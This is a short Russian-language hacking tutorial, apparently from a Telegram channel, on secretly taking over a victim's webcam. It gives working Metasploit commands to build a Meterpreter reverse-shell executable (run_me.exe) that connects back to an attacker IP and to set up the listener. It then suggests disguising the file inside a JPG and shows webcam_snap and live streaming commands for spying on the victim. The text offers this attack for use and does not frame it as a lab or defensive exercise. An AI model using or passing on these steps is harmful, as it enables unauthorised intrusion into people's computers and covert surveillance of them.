Взлом вебки
https://t.me/ppxv1Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже:
Код:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe
LHOST=192.168.1.5 – IP-адрес атакующего
LPORT=4444 – порт атакующего
Запускаем Metasploit:
Код:
# msfconsole
Далее вводим команды:
Код:
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.5
> exploit
Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Чтобы узнать как скрыть/склеить exe-файл в jpg вооружайтесь googl’ом..
После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем.
Сначала посмотрим, есть ли вообще у него web-камера?
Код:
meterpreter > webcam_list
1: Logitech Webcam 120
Если повезло делаем снимок:
Код:
meterpreter > webcam_snap
Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой:
Код:
meterpreter > run webcam -p /var/www
После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите:
Код:
/var/www/webcam.html